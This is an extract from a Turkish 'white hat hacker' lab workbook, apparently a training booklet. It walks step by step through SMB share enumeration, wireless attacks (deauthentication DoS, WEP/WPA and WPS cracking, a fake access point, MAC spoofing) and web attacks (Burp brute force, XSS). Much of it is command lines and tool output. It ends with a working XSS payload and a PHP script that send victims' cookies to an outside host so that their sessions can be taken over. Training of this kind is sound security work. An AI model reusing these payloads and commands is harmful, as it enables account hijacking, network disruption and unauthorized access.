| smb-enum-shares:
| ADMIN$
| Anonymousaccess:<none>
| C$
| Anonymousaccess:<none>
| IPC$
|_ Anonymousaccess:READ
Nmap done:10 IPaddresses(6hostsup) scanned in 6.42 seconds
101.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Adım:Read/Write haklarasahippaylaşımbulma;
root@bt:~# nmap6.6.6.100-150 --script=smb-enum-shares-PN-p139,445 -n
Nmapscan reportfor 6.6.6.110
Host isup (0.0035s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host scriptresults:
| smb-enum-shares:
| ADMIN$
| Anonymousaccess:<none>
| Currentuser ('guest') access:<none>
| C$
| Anonymous access:<none>
| Currentuser ('guest') access:<none>
| ComPrinters
| Anonymousaccess:<none>
| Current user ('guest') access:READ
| D$
| Anonymousaccess:<none>
| Currentuser ('guest') access:<none>
| IPC$
| Anonymous access:READ<not a file share>
| Currentuser ('guest') access:READ<not a file share>
| PaylasılanDosya
| Anonymousaccess:<none>
|_ Current user ('guest') access:READ/WRITE
Ek Kaynaklar:
---
102.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Kablosuz Ağ Güvenliği
Uygulama No:BGA-PT-25
Uygulama Adı: İşletim Sistemine Kablosuz Ağ Adaptörünün Tanıtılması
Amaç: USB kablosuzağadaptörünüsisteme tanıtma
KullanılanAraçlar:
Iwconfig
lshw
Adımlar:
1.Adım: MAC OS üzerinde sanal sistemleriniz mevcut ise USB wireless adaptörünüzü taktığınızda
aşağıdaki gibi bir ekranda hangi sanal sisteminizde veya MAC OS sisteminizden hangisini tercih
edeceğinizsize sorulacaktır;
2.Adım: VMWare Playerüzerindende aşağıdaki gibi USBwirelessadaptorsistemetanıtılabilir;
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
bus info:usb@1:1
logical name:wlan1
serial: 54:e6:fc:8a:2b:1b
capabilities:ethernet physical wireless
configuration: broadcast=yes driver=rt2800usb driverversion=3.2.6 firmware=N/A link=no
multicast=yeswireless=IEEE 802.11bg
4.Adım: iwconfigkomutuile de sisteminizdekitümkablosuzağadaptörlerinilisteleyebilirsiniz;
root@bt:~# iwconfig
lo no wireless extensions.
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed AccessPoint:Not-Associated Tx-Power=0dBm
Retry long limit:7 RTS thr:off Fragmentthr:off
Encryption key:off
PowerManagement:on
eth0 no wireless extensions.
5. Adım: Tanıtılan wifi adaptörünün injection destekleyip desteklemediğini anlamak için verilmesi
gerekenkomutlar;
airreply-ng -9 wlan0
airmon-ng startwlan0
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-26
Uygulama Adı: Wifi Ağ Adaptörünü Monitor ModaGeçirme
Amaç: Kablosuzağadaptörünüortamdaki tümpaketleri yakalayabilmesiiçin(hedefi nere olursaolsun)
KullanılanAraçlar:
iwconfig
Adımlar:
1.Adım: Aktif kablosuzağarabirimlerinlistesinigörüntülemekiçiniwconfigkomutukullanılabilir;
root@bt:~# iwconfig
105.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
lo no wireless extensions.
wlan1 IEEE 802.11bg ESSID:off/any
Mode:Managed AccessPoint:Not-Associated Tx-Power=20dBm
Retry long limit:7 RTS thr:off Fragmentthr:off
Encryption key:off
PowerManagement:on
eth0 no wireless extensions.
2.Adım: wlan1 isimli kablosuz ağ interface’mizi monitör moda almak için airmon-ng komutu kullanılabilir.
root@bt:~# airmon-ngstartwlan1
Found 2 processesthatcould cause trouble.
If airodump-ng,aireplay-ng orairtun-ng stopsworking after
a shortperiod of time,you may wantto kill (someof) them!
PID Name
5017 dhclient3
32238 dhclient
Interface Chipset Driver
wlan1 Ralink RT2870/3070 rt2800usb - [phy2]
(monitormodeenabled on mon0)
3.Adım: dhclient3 ve dhclient toollarının çalıştığı ve bunların bir müddet sonra sorun çıkarabileceği
konusundauyarıaldık.Sağlıklıçalışmasıiçinbu processleri sonlandırıptekrarçalıştırmamızgerekiyor.
root@bt:~# killall dhclient
root@bt:~# killall dhclient3
root@bt:~# airmon-ngstartwlan1
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb - [phy2]
wlan1 Ralink RT2870/3070 rt2800usb - [phy2]
(monitormodeenabled on mon1)
4.Adım:Monitormoddançıkmak için;
root@bt:~# airmon-ngstartwlan1
Interface Chipset Driver
106.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
mon0 Ralink RT2870/3070 rt2800usb - [phy2]
wlan1 Ralink RT2870/3070 rt2800usb - [phy2]
(monitormodedisabled)
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-27
Uygulama Adı: Gizli Olarak Ayarlanmış Kablosuz Ağların Keşfi
Amaç: Ortamda güvenliği bir nebze sağlayabilmek için gizlenmiş kablosuz ağları bulmak ve bunların
üzerinde varsabaşkagüvenlikaçıklarıbulmak.
KullanılanAraçlar:
Aireplay-ng
Airodump-ng
Adımlar:
1.Adım : Öncelikle ESSID değeri gizli olarak ayarlanmış kablosuz cihazların ESSID değerini bulmadan önce
bu cihazaait BSSID(MACadresi) değerini bulmamızgerekiyor.
root@bt:~# airodump-ngwlan1
ESSID ismi Lenght:number şeklinde olan cihazlar ESSID değer gizli ayarlanmış cihazlardır.Burada iki
noktadan sonraki kısım ESSID isminin muhtemel karakter sayısıdır. Bizim örneğimizde 1 karakterli bir gizli
ESSID’li cihazbulunmuşturve BSSIDdeğeri 00:13:49:E8:E7:50 ‘dir.Ve 11.kanaldayayınyapmaktadır.
107.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım:11. kanala geçip bu kablosuza bağlanmış bir client MAC adresine ihtiyacımız var bunu bulmak
içinairodump-ngaracını aşağıdaki gibi kullanabiliriz.
root@bt:~# airodump-ng-c11 --bssid00:13:49:E8:E7:50 wlan1
3.Adım:Bu kablosuza bağlanmış 44:D8:84:B9:43:53 MAC adresine sahip bir client bulduk. Şimdi bu clienti
düşürüptekrarbağlanmasınısağlayacağız ve bu arada bağlanmakistediğiESSIDbilgisini sniff edeceğiz.
root@bt:~# aireplay-ng-040 -a 00:13:49:E8:E7:50 -c 44:D8:84:B9:43:53 wlan1
22:57:56 Waiting forbeacon frame(BSSID:00:13:49:E8:E7:50) on channel11
22:57:57 Sending 64 directed DeAuth.STMAC:[44:D8:84:B9:43:53] [ 0|35 ACKs]
22:57:57 Sending 64 directed DeAuth.STMAC:[44:D8:84:B9:43:53] [ 0|34 ACKs]
22:57:58 Sending 64 directed DeAuth.STMAC:[44:D8:84:B9:43:53] [ 0|17 ACKs]
22:57:59 Sending 64 directed DeAuth.STMAC:[44:D8:84:B9:43:53] [ 0|12 ACKs]
22:57:59 Sending 64 directed DeAuth.STMAC:[44:D8:84:B9:43:53] [ 0|15 ACKs]
4.Adım: Gönderilen paketler bittikten sonra clientin tekrar gizli essid kablosuzuna bağlanırken biz essid
değerini sniff edeceğiz
root@bt:~# airodump-ng-c11 --bssid00:13:49:E8:E7:50 wlan1
CH 11 ][ Elapsed:4 mins][ 2012-12-13 23:00
BSSID PWR RXQ Beacons #Data,#/s CH MB ENC CIPHERAUTH ESSID
00:13:49:E8:E7:50 -80 11 559 0 0 11 54 . WEP WEP A
BSSID STATION PWR Rate Lost Frames Probe
00:13:49:E8:E7:50 44:D8:84:B9:43:53 -72 0 -24 0 8
Gördüğünüzgibi gizli essiddeğeri A olarakbulunmuştur.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-28
108.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Uygulama Adı: WEP Şifreleme Kullanılan Ağlara YönelikŞifre Kırma
Amaç: WEP kullanankablosuzağlarıele geçirmekve buağlardaki tümclientlarayöneliksızmagirişimleri.
KullanılanAraçlar:
Airodump-ng
Aircrack-ng
Adımlar:
1.Adım: Hedef hakkında aşağıdaki bilgilere sahip olunduğunu varsayalım.(Bu bilgilerin nasıl
bulunabileceği birüstkonudadeğinildi.İlgilikomut
root@bt:~# airodump-ngwlan1 şeklindedir)
ESSID
ttv1
BSSID
00:23:F8:A3:CD:9F
Client
00:1C:B3:C2:3D:F3
4C:0F:6E:D6:8D:BF
Channel
6
2.Adım: Hedef hakkında iv paketleri toplayıp bunları web-01 isimli dosyaya yazdırıyoruz.
root@bt:~# airodump-ng --channel 6 --bssid 00:23:F8:A3:CD:9F --ivs -w web mon0
3.Adım: Paketleri kaydettiğimiz dosyayı(web-01.ivs isimli bir dosya oluşacaktır) kırması için aircrack-ng
isimli tool’a veriyoruz.
root@bt:~# aircrack-ng web-01.ivs
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-29
Uygulama Adı: WPA Kullanılan Ağlarda Şifre Kırma
109.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Amaç: WPA kullananağlarıele geçirmekve buağlardabulunanclient’larayöneliksızmagirişimleri.
KullanılanAraçlar:
Airodump-ng
Aireplay-ng
Aircrack-ng
Adımlar:
1.Adım: Hedef hakkında aşağıdaki bilgilere sahip olunduğunu varsayalım.(Bu bilgilerin nasıl
bulunabileceği birüstkonudadeğinildi.
İlgili komutroot@bt:~# airodump-ngwlan1 şeklindedir)
ESSID
ttv1
BSSID
00:23:F8:A3:CD:9F
Client
00:1C:B3:C2:3D:F3
4C:0F:6E:D6:8D:BF
Channel
6
2.Adım: Hedef hakkında WPA handshake yakalayabilmek için paket toplayıp bunları bgatest isimli
dosyaya yazdırıyoruz.
root@bt:~# airodump-ng --channel 6 --bssid 00:23:F8:A3:CD:9F -w bgatest mon0
3.Adım: Eğer hala WPA handshake yakayalamadıysak, Deuauthentication paketleri ile istemciyi kablosuz
ağdan düşürelimve tekrarWPA handshake yapıpbağlanmasınısağlayalım.
root@bt:~# aireplay-ng --deauth 100 -a 00:23:F8:A3:CD:9F -c 00:1C:B3:C2:3D:F3 mon0
3.Adım:Elde ettiğimiz WPA handshake’i bruteforce saldırısı ile kıralım.
root@bt:~# aircrack-ng bgatest-02.cap -w /wordlistdosyasinin-yolu.txt
Ek Kaynaklar:
---
110.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
UygulamaNo:BGA-PT-30
Uygulama Adı: WPS Destekli Ağların Keşfi ve Ağ Giriş Parolasının Bulunması
Amaç: Hedef kablosuzağlarasızmak
KullanılanAraçlar:
Airmon-ng
Wash
Reaver
Adımlar:
1.Adım: Kablosuzağkartını monitormodaalmak
root@bt:~# airmon-ngstartwlan0
Found 3 processesthatcould cause trouble.
If airodump-ng,aireplay-ng orairtun-ng stopsworking after
a shortperiod of time,you may wantto kill (someof) them!
PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Processwith PID2134 (dhclient3) is running on interfacewlan0
InterfaceChipsetDriver
wlan0 RalinkRT2870/3070 rt2800usb – [phy0]
(monitormodeenabled on mon0)
2.Adım:WPSdestekli kablosuzağlarıbulmak;
root@bt:~# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright(c) 2011, Tactical NetworkSolutions,Craig Heffner<cheffner@tacnetsol.com>
BSSIDChannelRSSIWPS Version WPSLocked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMISI
111.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not
edelim.
BSSID = 33:22:55:22:11:2F
CH = 9
3.Adım: BSSID ve kanal numarasını bildiğimizWPSkablosuzağınıkırmak;
root@bt:~# reaver -i mon0 -b33:22:55:22:11:2F -c9 -vv –no-nack-d5 -f -x298
Reaverv1.4 WiFi Protected Setup AttackTool
Copyright(c) 2011, Tactical NetworkSolutions,Craig Heffner<cheffner@tacnetsol.com>
[+] Switching mon0to channel9
[+] Waiting for beacon from33:22:55:22:11:2F
[+] Associated with33:22:55:22:11:2F (ESSID:BGA)
[+] Trying pin 47128211
[+] Sending EAPOLSTARTrequest
[+] Received identity request
[+] Sending identityresponse
[+] Received M1 message
[+] Sending M2message
[+] Received M3 message
[+] Sending M4message
[+] Received M5 message
[+] Sending M6message
[+] Received M7 message
[+] Sending WSCNACK
[+] Sending WSCNACK
[+] Pin cracked in 9 seconds
[+] WPSPIN: ’47128211′
[+] WPAPSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done,nothing to save.
Ek Kaynaklar:
---
UygulamaNo:BGA-PT-31
Uygulama Adı: Kablosuz Ağlara Yönelik DoS Testleri
112.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Amaç: Kablosuz ağı,ağdaki tüm clientları veya belli basil clientları sistemden düşürerek tekrar
bağlanmasınısağlayarakkimlikdoğrulamaesnasındaçeşitlibilgilerelde etme.
KullanılanAraçlar:
Airodump-ng
Aireplay-ng
Adımlar:
1.Adım: Mevcut Kablosuzyayın yapancihazlarıbulalım;
root@bt:~# airodump-ngwlan1
CH 6 ][ Elapsed:1 min ][ 2012-12-14 00:20
BSSID PWR Beacons #Data,#/s CH MB ENC CIPHERAUTH ESSID
F8:D1:11:44:34:37 -46 61 0 0 1 54e WPA2 CCMP PSK spartaq
00:1D:19:15:0A:A8 -83 9 0 0 11 54 WPA2 CCMP PSK AIRTIES_RT-205
BSSID STATION PWR Rate Lost Frames Probe
F8:D1:11:44:34:37 B8:8D:12:22:0D:A0 -18 0 - 1 0 6
2.Adım: spartaq isimli ssid’yi kendimize hedef seçiyoruz.Aireplay-ng aracı ile bir kablosuz ağa broadcast
olarak deauth paketleri göndererek tüm clientların düşürülmesi sağlanabileceği gibi belli bir client hedef
alınarakda deauth paketleri gönderilerek bağlantısı düşürülebilir.Spartak için broadcasta deauth
paketleri göndererektümclientleri düşürmekiçin;
root@bt:~# aireplay-ng-01000 -a F8:D1:11:44:34:37 wlan1
00:31:07 Waiting forbeacon frame(BSSID:F8:D1:11:44:34:37) on channel1
NB: this attackis moreeffective when targeting
a connected wirelessclient (-c<client's mac>).
00:31:08 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:08 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:08 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:09 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:09 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:10 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
00:31:10 Sending DeAuthto broadcast-- BSSID:[F8:D1:11:44:34:37]
00:31:11 Sending DeAuthto broadcast -- BSSID:[F8:D1:11:44:34:37]
113.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Aynı anda internet bağlantımızı ping ile kontrol ettiğimizde aşağıdaki gibi google dns serverlarına(8.8.8.8)
erişemedigimizi görebilirsiniz.
root@bt:~# ping8.8.8.8
PING8.8.8.8 (8.8.8.8) 56(84) bytesof data.
64 bytesfrom8.8.8.8: icmp_seq=1 ttl=48 time=91.5 ms
64 bytesfrom8.8.8.8: icmp_seq=2 ttl=48 time=91.5 ms
64 bytesfrom8.8.8.8: icmp_seq=3 ttl=48 time=92.4 ms
ping:sendmsg:Networkis unreachable
ping:sendmsg:Networkisunreachable
ping:sendmsg:Networkisunreachable
ping:sendmsg:Networkisunreachable
ping:sendmsg:Networkisunreachable
ping:sendmsg:Networkisunreachable
3.Adım: Belli birclient’ayönelikDDOS(Denialof service)saldırısıyapıpsistemdendüşürme;
root@bt:~# aireplay-ng-01000 -a F8:D1:11:44:34:37 -cB8:8D:12:22:0D:A0 wlan1
00:37:45 Waiting forbeacon frame(BSSID:F8:D1:11:44:34:37) on channel1
00:37:46 Sending 64 directed DeAuth.STMAC:[B8:8D:12:22:0D:A0] [24|65 ACKs]
00:37:46 Sending 64 directed DeAuth.STMAC:[B8:8D:12:22:0D:A0] [19|64 ACKs]
00:37:47 Sending 64 directed DeAuth.STMAC:[B8:8D:12:22:0D:A0] [17|63 ACKs]
00:37:47 Sending 64 directed DeAuth.STMAC:[B8:8D:12:22:0D:A0] [18|63 ACKs]
00:37:48 Sending 64 directed DeAuth.STMAC:[B8:8D:12:22:0D:A0] [18|62 ACKs]
Ek Kaynaklar:
---
Uygulama No:BGA-PT-32
Uygulama Adı: Sahte Kablosuz Ağ Erişim Noktası [Fake AP] Oluşturulması
Amaç: Kuruma ait kullanıcıları fake olarak kurduğumuz Access Pointlara (kurum kablosuz ağlarına benzer
isimler verdiğimiz kablosuz ağlar) bağlanmalarını sağlayarak bir sonraki adımlarda kullanılabilecek hassas
bilgilere erişim
KullanılanAraçlar:
Airbase-ng
Adımlar:
1.Adım:Testkablosuzağerişimnoktası(Fake AP) oluşturmakiçinairbase-ngaracı kullanılabilir;
root@bt:~# airbase-ng-ebga-fake-ap-c11 -vwlan1
114.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
00:55:21 Created tap interface at0
00:55:21 Trying to set MTU on at0 to 1500
00:55:21 Access PointwithBSSID 54:E6:FC:8A:2B:1B started.
00:55:35 Got broadcastproberequestfromB8:8D:12:22:0D:A0
00:55:35 Got broadcastproberequestfromB8:8D:12:22:0D:A0
2.Adım: bga-fake-apisimlisahte accesspointoluştuğunugörelim;
Ek Kaynaklar:
---
Uygulama No:BGA-PT-33
Uygulama Adı: Wifi Ağlarda MAC Adres Filtreleme Atlatma
Amaç: GüvenlikiçindevreyealınmışolanMACadresi ile kimlikdoğrulamaönlemini atlatmak.
KullanılanAraçlar:
Airodump-ng
Macchanger
115.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Aireplay-ng
Adımlar:
1.Adım: Hedef wifi noktasının belirlenmesi ve o bağlantıdan IP alan bir clientin MAC adresinin bulunması.
root@bt:~# airodump-ngwlan1
CH 10 ][ Elapsed:2 mins][ 2012-12-22 07:24
BSSID PWR Beacons #Data,#/s CH MB ENC CIPHER AUTHESSID
00:13:49:E8:E7:50 -1 0 1 0 158 -1 WEP WEP <length: 0>
F8:D1:11:44:34:37 -45 113 0 0 1 54e WPA2CCMP PSK spartaq
38:22:9D:43:18:8C -74 48 0 0 6 54 WPA TKIP PSK Jackson
BSSID STATION PWR Rate Lost Frames Probe
00:13:49:E8:E7:50 D8:30:62:95:9B:C1 -74 0 - 2 38 23 ozermobile
F8:D1:11:44:34:37 B8:8D:12:22:0D:A0 -18 0 - 1 0 5
(notassociated) 84:85:06:96:BF:16 -40 0 - 1 0 2
(notassociated) 48:DC:FB:7D:4C:E0 -68 0 - 1 0 12 Jackson
2.Adım: Station ile belirtilen MAC adresleri client’lara ait mac adresleridir. Bu adres alınır ve kendi
sistemimizie atanırbununiçinmacchangerveyaifconfigkomutlarıkullanılabilir.
root@bt:~# macchanger-m D8:30:62:95:9B:C1 wlan1
3.Adım: Bu mac adresini kendimizeatadıktansonrabuclientdüşürmemizgerekecek
root@bt:~# aireplay-ng-01000 -a 00:13:49:E8:E7:50 -c D8:30:62:95:9B:C1 wlan1
4.Adım: Hedef wifi noktasınaartıkclientlardanbirine aitsahte macadresi ile bağlantıyapılabilir.
Ek Kaynaklar:
-----
Uygulama No:BGA-PT-34
Uygulama Adı: Windows Sistemde Kayıtlı Wifi Parolalarının Bulunması
Amaç: Ele geçirilen bir windows makina üzerinden ortamdaki digger kablosuz ağlara ait parolaların
bulunmasıve diğerağlarada sızma.
KullanılanAraçlar:
WirelessKeyView
116.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Adımlar:
1.Adım : WirelessKeyView isimli windows uygulaması indirilerek daha önceden bağlanılmış tüm kablosuz
ağlara aitparolalargörüntülenebilir.
Ek Kaynaklar:
Web Uygulama Güvenliği Lab Uygulamaları
Uygulama No:BGA-PT-35
Uygulama Adı: Web Sunucu Bilgilerinin Bulunması
Amaç: Hedef sisteme ait şuanki ve geçmişe yönelik işletim sistemi ve kullanılan uygulamaları tespitetme.
KullanılanAraçlar:
Netcraft
Nmap
Adımlar:
1. Adım: Netcraft.com üzerinden domainin barındırıldığı sunucunun şuanki ve geçmiş tarihlerdeki işletim
sistemi ve websunucubilgisininbulunması;
117.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Site Reportdenilereksiteningeçmişte tutulduğuwebsunucubilgilerinede erişilebilir.
118.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Adım: Nmap ile işletim sistemi ve çalışan web server bilgisini alabilmek için -O ve -sV komutları birlikte
kullanılmalıdır.
119.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-36
Uygulama Adı: Web Uygulamasına Ait Alt Dizin ve Dosyaların Keşfi
Amaç: Hedef web uygulamasının bilinmeyen alt dizinlerinin ve bu dizinler altındaki dosyaların
keşfedilmesive buralardagüvenlikzaafiyeti arama.
KullanılanAraçlar:
dirbuster
Adımlar:
1. Adım:Dirbusterile altdizinve dosyakeşfi;
Backtrack işletimsistemi üzerinde aşağıdaki yolutakipederekilgili tool’aerişebilirsiniz.
Browse diyerekaltdizinde kullanılacakkelime listesini(wordlist)veriyoruz.
120.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Eğer sadece alt dizin değil bu dizinlerin altındaki dosyalarıda aramak istiyorsak Brute force Files
menüsünüde seçiyoruzve siteninkodlandığıdile aituzantıyı(php,aspvs) dabelirtiyoruz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-37
Uygulama Adı: HTML Form Auth. Korumalı Sayfalara Yönelik Kaba Kuvvet Parola Denemeleri
Amaç: Web uygulamalarında basit kimlik doğrulama kullanan sayfalara yönelik kaba kuvvet saldırıları
yaparak doğrukullanıcıparolaelde etmek.
KullanılanAraçlar:
burbsuite
fireforce
Adımlar:
123.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Burbsuite kullanarak html form kullanan kimlik doğrulama sayfalarına yönelik brute force saldırısı
yapma;
1 Adım:Web browser(firefox) üzerindenproxyayarlarımızıyapıyoruz;
2 Adım:BurpSuite uygulamamızıçalıştıralım;
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4. Adım: Yukarıdaki gibi kullanıcı adı şifremizi girdikten sonra bu oluşan trafik bizim proxy olarak
kullandığımız burpsuite uygulamamız üzerinden geçecektir.Yukarıdaki ekranda Sign in demeden önce
isteği yakalamasıiçinburpüzerindenaşağıdaki gibi interceptisonyapıyoruz.Ve ardındanSignindiyoruz.
5. Adım : Yukarıdaki ekranda sağ tıklayıp send to intruder diyelim ve intruder sekmesi altında aşağıdaki
ekranla karşılaşacağız.Burada tüm text bölümünü seçerek sol taraftan clear dedikten sonra email ve
password input değerlerini seçip add diyoruz.Attack type kısmını cluster bomb seçip son halinin
aşağıdaki gibi olmasınısağlıyoruz.
126.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6. Adım: Gmail üzerinden denemek istediğimiz kullanıcı adlarını payload 1 kısmına giriyoruz aşağıdaki
gibi.Textbox'a istediğimiz kullanıcı adlarını girip ekleyebileceğimiz gibi, load butonu ile bir dosyadan da
kullanıcıadlarını importedebiliriz.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
8. Adım: Saldırıyı intruder menüsü altından start attack diyerek başlatalım ve sonuclarına
bakalım.Burbsuite aracının lisanslı sürümünü kullanmadığımız için denemeler biraz yawaş olacaktır.
Aşağıda response menüsü altındaki render submenüsün de web arayüzünde çıktısını da görebiliriz
cevabın.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Kaba kuvvet saldırısı yapılacak form alanına sağ tıklanarak ister dosyadan yükleme yapılabilir
istenilirse desteklediği karakter aralıkları (a-z,A-Z,a-z0-9,0-9 v.b) ile belirtilecek boyutta word
listler(kelime listeleri) ile kaba kuvvet saldırısı yapılabilir.Aşağıda admin kullanıcısı için sözlükten
yükleyerekparolasınıkırmayaçalışıyoruz;
Bizdenhataanında websunucunundöneceği hatayısoracakaşağıdaki gibi;
131.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Bir kereye mahsusyanlışkullanıcıadı ve şifre girilerekwebsunucunundöneceği hatamesajıalınır;
Görüldüğügibi Invalidlogin! şeklindebirhatamesajıdönüldü.
Saniyede ki isteksayısıde girildiktensonra save denilereksaldırıbaşlatılır.
132.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
http://www.networkpentest.net/2012/04/burp-proxy-ile-web-uygulamalarnda-login.html
----
Uygulama No:BGA-PT-38
Uygulama Adı: XSS Kullanarak Kurbana Ait Cookie Bilgilerine Erişim
Amaç: XSS açıklığı bulunan sisteme login olmuş herhangi bir kullanıcıya phishing benzeri bir saldırı ile
cookie bilgisini elde etme ve kullanıcınınosistemdekioturumueldeetme.
KullanılanAraçlar:
Javascript
Php
CookieManager+
Adımlar:
1.Adım: Öncelikle hedef uygulamada Xss açıklığı olan yer tesbit edilecek. Input alan bölümlere XSS
açıklığını bulmak için çeşitli javascript örnekleri denenebilir. Biz cookie bilgisini aradığımız için
document.cookie fonksiyonunukullanacağız.Aşağıda
http://testasp.vulnweb.com/Search.asp?tfSearch= URL’inde tfSearch parametresinde XSS açıklığından
faydalanılarakcookie bilgisiniekranaalertolarakverenXssexploitörneğiverilmiştir.
133.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Adım 2: Kurbana ait bu cookie değerini email adresimize göndertmek istersek öncelikle aşağıdaki php
scriptini kendi domainsunucumuzacookie.phpismiyle kaydedelim.
<?php
$cookie = $HTTP_GET_VARS["cookie"];mail("celal.erdik@bga.com.tr","Yenicookie bulundu",$cookie);
?>
Adım 3: Uzak sisteme login olmuş kurbana aşağıdaki linke bir şekilde(email phishing) bağlanması sağlanır.
http://testasp.vulnweb.com/Search.asp?tfSearch=<script>location.href =
'http://www.bga.com.tr/cookie.php?cookie='+document.cookie;</script>
Adım 4: Artık kurbanlar gönderdiğiniz bağlantılara bağlandıkça onlara ait cooki bilgileri mail adresimize
gönderilecektir.
Adım 5: Elde edilen cookie örneğin facebook.com’a ait ise bu cookie bilgisi browsera import /edit
edilerek facebook.com adresi çağrıldığında kurbana ait facebook hesabı açılacaktır. Cookie Manager+
isimli firefoxeklenisi buişiçinkullanılabilir.
---
Uygulama No:BGA-PT-39
Uygulama Adı: XSS Kullanarak Kullanıcının Browserını Yönetme
Amaç:
KullanılanAraçlar:
beef (beef xssdie arat)
Adımlar:
1.Adım :
